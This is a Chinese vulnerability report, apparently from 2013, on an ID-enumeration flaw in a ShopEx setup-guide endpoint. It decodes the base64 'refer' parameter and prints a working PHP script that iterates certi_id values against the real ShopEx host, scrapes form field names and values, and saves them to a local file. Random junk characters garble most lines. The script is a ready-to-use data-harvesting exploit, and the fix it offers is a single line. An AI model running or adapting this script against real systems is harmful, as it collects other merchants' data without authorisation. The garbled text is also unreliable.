|
简要描述:
6 q! t% n+ n3 @2 t% @ x8 [- MShopEx某接口缺陷,可遍历所有网站+ ~+ w- `9 X0 B. U
详细说明:
7 r( N% Z6 D) m: O0 \4 i' B问题出现在shopex 网店使用向导页面
# @/ q2 y* A( Q' n* y9 g% Y' O& x3 O5 I, P: L
7 P+ Q: k% w3 B9 o0 d- t& z
V0 s8 T5 Y! B/ Q! ?, ahttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
- q o/ E! u' J. w2 Q8 q, T. d
& K9 @* i5 o) A& a% T9 \
! y/ d8 U0 J. {# g) R
: P" ]0 c1 y- m6 t4 Qrefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
- B: U8 o0 J9 F1 ^5 j0 T) z" V* ]6 v# n2 h" u$ J/ I4 [8 A
( |1 R2 J& A0 h* O/ O7 \4 t5 F* V& G
2 F& ^! O8 @0 a' A
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
! }( r7 t8 @) W
5 D! _" {9 W' n |6 b _3 q$ W+ a$ L, t o* y$ d- N/ O$ |/ }! i
( L/ _' M* x2 L' Q+ L1 i; D7 |<?php/ d0 }" E8 C9 b0 a* z
- r3 O# c( o V- [6 L6 K6 B for ($i=1; $i < 10000; $i++) { //遍历5 g9 D& e7 t8 q$ y8 G. {
5 q/ P( x, g3 }- g% ~
ShowshopExD($i);
0 I$ r; h. B; O4 q( }" l" i [5 z- l$ ~/ {! u! P' P
}) v' Q% R( ^) @' O) s
1 a1 }, y2 @5 U: [5 B function ShowshopExD($cid) {
+ h" M; [' b: @2 q& {- C' |! O8 J% L: `6 ~% Q% {
$url='http://guide.ecos.shopex.cn/step2.php';& B$ { I& P& W. j, ]9 j3 T! s
' F; C. g; G' S8 E- V* m* U2 p
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');) f/ B" ?. F4 @; I
4 d* h( U& s% \& V- u, K; Z& l; h! J $url = $url.'?refer='.$refer;
- ^+ H6 |; ~) D& x0 q( w
8 a4 w. X I' [; [ $ch = curl_init($url);
, A( K% T7 E7 D
w8 u8 k0 D* B# v* c; @: | curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;- X9 j R9 U5 y) }. t3 J
1 `+ G3 p8 o5 j% {% h8 |
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;, j0 L) Q! H1 ?: I8 |# D+ m# o5 Q
- B; P$ q, G! v# f1 s
$result = curl_exec($ch);5 o% H _/ l' e$ t+ }% O
' }' t* s. V( _9 i& _$ x
$result = mb_convert_encoding($result, "gb2312", "UTF-8");# }! G% p% c6 I# ?
8 f) W9 B, l V2 v9 W7 i
if(strpos($result,$refer))
' i5 o' {+ @/ i+ M, |+ @$ M! u U6 h
{
4 o8 M- E$ ^# M }1 m% W) ~1 E
9 m( C8 n4 }' N$ N, h $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
) M3 S! ]7 r- X u+ A4 Y }3 d1 C" g
7 [3 D! [3 s) c! `/ [ preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
: e- J I7 N! B5 N/ U1 ]) e2 Q& ^1 D! K$ G& }
foreach ($value[1] as $key) {
3 c+ ]0 P, F% Y) C; i
2 V' n+ H X8 |, p preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
' [5 |6 j9 _* y) u* M+ F
]- U2 F# c2 Z" F- O echo $res[1][0].':'.$res[3][0]."\r\n";
# F0 R3 G1 k2 E p! r
, P8 z% v o6 b $col =$res[1][0].':'.$res[3][0]."\r\n"; 2 F8 v* I: T5 ]" c0 |* V$ H7 g M
1 b% S; t3 f" R5 L
fwrite($fp, $col, strlen($col));
0 I/ L& v6 P8 {8 ~# E1 a* M* y6 m) i% `$ R, ?% k) S! d4 t
}
' t* ~2 Q- g; m# F3 v, n$ L, B! P4 e; B2 s/ l* w
echo '--------------------------------'."\r\n";
7 J8 X' T( T9 Y2 n- t/ K/ U/ ?0 O" Q8 m! R/ h" W
fclose($fp);
9 A1 e d- q' i( p
7 G0 b7 i+ T- O5 \" n }
+ u7 N: H: q( G: @9 @! S. a% @" x% f# p9 L* C R
flush();' }+ R4 k6 @9 W( n
9 V; B1 T, z6 d7 W. h' l curl_close($ch);
2 j. r. F. f) `& G' N3 _4 d* b5 d/ W( R: m6 ~ q% \
}
& |1 w' ?* y0 H' t8 i, D1 N |( H# i/ s# s7 k0 g
?>
' I' ~8 O$ n; i) G% W漏洞证明:" Y( ]# k+ j4 A; N' b, o& N
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg& U( j/ N$ S* X% }4 Q
refer换成其他加密方式8 u/ X/ U7 L! M% Y- v
|
|